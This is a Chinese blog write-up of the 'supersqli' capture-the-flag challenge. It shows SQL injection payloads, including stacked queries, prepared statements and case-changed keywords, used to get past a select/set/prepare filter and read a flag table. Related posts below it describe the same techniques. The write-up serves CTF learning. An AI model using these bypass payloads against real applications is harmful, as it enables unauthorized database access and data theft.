supersqli

最新推荐文章于 2025-01-17 21:33:56 发布
最新推荐文章于 2025-01-17 21:33:56 发布
阅读量370 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: p2p sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/shayebudon/article/details/121875813
本文详细介绍了如何通过二分法确定列数,利用堆叠查询和预编译来绕过过滤执行多条SQL语句。在尝试获取表名和列名的过程中,遇到的过滤限制(如set和prepare)也被通过大小写绕过。最终成功获取到名为'flag'的内容,揭示了数据库中的敏感信息。内容涉及SQL注入技术及其在实际场景中的应用和防御策略。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

用二分法查看列数(有两列)

1' order by  2 #
 

 1' order by  3 #

 

接下来union联合查询,发现select被过滤了 -1' union select 1,2 #

 需要绕过select的过滤

  堆叠查询+预编译

我们发现这里可以执行多sql语句,所以我们可以采用堆叠查询,那我们查询表名,结果如下

 查询表中的列名

 

 我们发现flag在第一个表中,查看表中的内容,但是select被过滤 想要绕过过滤 我们这里采用了预编译的方法绕过

;set @sql = CONCAT('sele','ct * from `1919810931114514`;');prepare aaa from @sql;EXECUTE aaa;#

但是执行后出现了下图所示的结果

 这里同时过滤了set和prepare  我们同时也要绕过他,我们采用大小写的方式进行绕过

;sEt @sql = CONCAT('sele','ct * from `1919810931114514`;');prepArE aaa from @sql;EXECUTE aaa;#

 

拿到flag

 

shayebudon
关注
【网络安全 | CTF】攻防世界 supersqli 解题详析
等风来
05-27 5087
堆叠注入(stacked injection)是一种SQL注入攻击的技术手段,它会在同一行代码中多次使用已知的SQL注入漏洞,从而达到绕过安全措施、执行恶意代码和窃取数据库信息等目的。堆叠注入攻击利用了SQL语句的连贯性,通过在查询语句中嵌入多个SELECT语句或在UPDATE语句中嵌入多个SET赋值的情况来强行插入额外的恶意代码段。表示注释掉其后面的内容,因此程序会执行两次SQL语句,并忽略掉密码的条件,最终返回敏感数据的行数,从而达到了窃取数据库敏感信息的目的。断开原有语句,再插入新的SQL语句。
攻防世界之supersqli
qq_44111753的博客
11-16 388
攻防世界 supersqli 题目 WP: 输入1、2、3提交 发现输入的数值提交到inject 发现inject存在sql注入风险 尝试堆叠注入 发现数据库 查看supersqli中的表 发现两个表 尝试查询表内的所有内容 发现对select|update|delete|drop|insert|where进行了过滤 继续查看字段 发现1919810931114514表中的flag,但无法使用select语句,不能直接输入,但发现words表中的id属性和输入的参数inject很相似,都为整型
SuperSQL:跨数据源、跨DC、跨执行引擎的高性能大数据SQL中间件
腾讯技术工程
09-23 1842
导语:SuperSQL是腾讯数据平台部自研的跨数据源、跨数据中心、跨执行引擎的统一大数据SQL分析平台/中间件,支持对接适配多类外部开源SQL执行引擎,如Spark、Hi...
sql 占比_SuperSQL:跨数据源、跨DC、跨执行引擎的高性能大数据SQL中间件
weixin_39929877的博客
12-06 369
导语:SuperSQL是腾讯数据平台部自研的跨数据源、跨数据中心、跨执行引擎的统一大数据SQL分析平台/中间件,支持对接适配多类外部开源SQL执行引擎,如Spark、Hive等。背景SuperSQL是一款自研的跨数据源、跨数据中心、跨执行引擎的高性能大数据SQL中间件,满足对位于不同数据中心的不同类型数据源的数据联合分析/即时查询的需求。SuperSQL的目标是成为公司内部统一的SQL分...
AI与大数据应用(下)SuperSQL:数据湖时代的高性能SQL引擎.pdf
09-07
AI与大数据应用(下)SuperSQL:数据湖时代的高性能SQL引擎
(参考案例)腾讯天穹 SuperSQL:统一大数据自适应计算平台技术解析
m0_59777389的博客
12-09 1020
本节首先介绍一下大数据普惠时代的业务困扰。首先,因历史原因,不同业务部署到不同的数据库(如 Hive、MySQL 等)上,异构数据源逐渐成为各公司数据孤岛形成的原因。其次公司内不同的数据中心有不同的集群,会存在不同版本的数据源。因为业务的发展,数据中心会部署很多不同的大数据处理引擎,但每个引擎适用的业务场景和技术特性不一样,这导致只能人工做数据搬迁和查询调优,数据安全和效率都难以保证。另外,不同的大数据引擎语法不一样,这导致切换引擎的成本升高,会造成一定的资源浪费。
SuperSQL注入.rar
07-21
一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 目前支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 1.支持任意地点出现的任意SQL注入 2.支持各种语言环境。大多数注入工具在盲注下,无法获取中文等多字节编码字符内容,本工具可完美解决。 3.支持注入数据发包记录。让你了解程序是如何注入,有助于快速学习和找出注入问题。 4.依靠关键字进行盲注,可通过HTTP相应状态码判断,还可以通过关键字取反功能,反过来取关键字。
2025.1.16——三、supersqli 绕过|堆叠注入|handler查询法|预编译绕过法|修改原查询法
最新发布
2402_87387800的博客
01-17 1391
查看源码,发现一句话:用sqlmap是没有灵魂的。所以可以先用sqlmap跑一下,然后尝试手工注入。
记录攻防世界关卡 supersqli
qq_56559508的博客
11-13 380
攻防世界关卡 supersqli
攻防世界 supersqli writeup
12-14
发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能使用#,不知道为什么没有,最后发现是在查询...
【攻防世界】Web 高手进阶区 supersqli (菜鸡蛋版本)
m0_52513952的博客
02-24 405
从进入高手进阶区开始,就越发觉得自己会的东西好少,php之前没学过,导致我压根看不懂之前那些需要读懂php源码才能拿到flag的题,于是我一跳再跳,终于看到了亲切而熟悉的“sql”,一道sql注入题,应该有机会能自己拿到flag了!!然而。。。
xctf-supersqli
qq_43579362的博客
03-16 1413
题目链接 1.首先打开题目链接是一个提交框,习惯性的先提交1看看返回什么结果, 返回了一个数组,再来提交1'看看, 根据回显可知这里可能存在sql注入,而且数据库为mysql,又根据报错提示提交1'#看看能不能闭合,提交后回显正常,说明是单引号闭合。 2.接下来使用order by看看联合注入的字段数,order by 2回显正常,order by 3,回显错误,说明字段数是2.然后就可以试试...
supersqliSQL注入流程及常用SQL语句)
Welcome To Myon'Blog !
03-30 1131
一、SQL注入知识学习 1、判断注入类型 (1)数字型注入判断 (2)字符型注入判断 2、猜解sql查询语句中的字段数(order by 的使用) 3、判断显示位爆数据库的名字 4、注释(--+的使用) 5、堆叠注入 6、handler语句及用法 二、基于上述知识对此题的分析与解答 1、注入点、注入类型 2、判断列数 3、利用or 1=1暴露表中数据 联合注入 (1)看数据库 (2)查表名 (3)查询表中的列 6、处理被过滤 7、handler、hackba的使用
攻防世界 supersqli
lzu_lfl的博客
09-15 326
攻防世界 supersqli_WP
【攻防世界】supersqli(堆叠注入)
2302_79800344的博客
04-09 1226
进入题目环境,有输入框与注入参数,推测类型为SQL注入:测试--注入类型为数字型还是字符型,构造payload:?inject=1 or 1=2 并提交: 发现页面依然正常,说明注入类型为字符型,则继续检查闭合方式,首先尝试单引号闭合,构造payload: ?inject=1' --+证实了闭合方式为单引号,继续测试字段数目(order by / group by ),经测试,字段数目为2。接着开始注数据库名,表名等关键信息:首先尝试Union联合注入---构造payload: ?inject=1' uni
攻防世界——supersqli进阶
qq_62046696的博客
05-04 1624
关于sqil的题目,这个真的是知识面太杂了。我研究了好几天,才看懂了这个题解。 打开场景以后,发现的是一个文本框,然后试一下有没有sql注入 先输入1发现回显正常,然后输入1‘发现出现错误,然后就可以判断存在sql注入 然后判断一下有几列,进行 1' order by 2#回显正常,但是1' order by 3#回显错误,所以可以确定一共有2列 发现select被禁用 然后就想到运用推叠注入, 想到首先查询一下数据库,然后发现supersqli这个就是要找的数据库 然后进行查表操作, ..
supersqli-攻防世界
szhangliwenya的博客
03-30 2727
因为 H 对应 ASCII 码值为 72,e 对应 ASCII 码值为 101,l 对应 ASCII 码值为 108,o 对应 ASCII 码值为 111。根据提交方式:POST注入,GET注入,HTTP HEAD注入。根据有无回显:联合注入,报错注入,布尔盲注,延时注入。1' and 1=1 #没报错判断为单引号字符注入。其他注入:堆叠注入,宽字节注入,二次注入等。1' order by 3#报错。
supersqli_攻防世界
u014794949
10-23 478
进入题目发现是文本框提交,通过尝试确定闭合字符和注入点 order by确定存在2个字段 1' order by 2# union select查询发现关键字过滤 通过堆叠注入得到库名 1';show databases;# 尝试得到表名 1';show tables;# 尝试得到两表中的列名 1';show columns from `1919810931114514`;# 1';show columns from `words`;# flag列中比较可能存放答案,words表里
攻防世界supersqli做题思路(堆叠注入,select绕过)
2301_80307383的博客
07-12 707
测试可知,words中的id有正常回显,可把flag所在的表和列改名为id所在的表和列。在尝试大小写,双写,加注释也没能绕过select,尝试堆叠注入。prepare用于预备一个语句,并赋予名称,以后可以引用该语句。打开题目,在已知为sql注入时,先测试闭合方式,输入1\。发现报错,接着尝试1' 和 1" 测试出闭合方式为单引号。接着访问1' or 1#即可得到flag。
攻防世界supersqli
08-09
Supersqli是一种强大的SQL注入攻击技术,它可以绕过应用程序的安全机制并获取未经授权的访问权限。攻击者可以通过在应用程序的输入字段中插入恶意的SQL代码,来执行未经授权的数据库操作。 为了防御Supersqli攻击,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值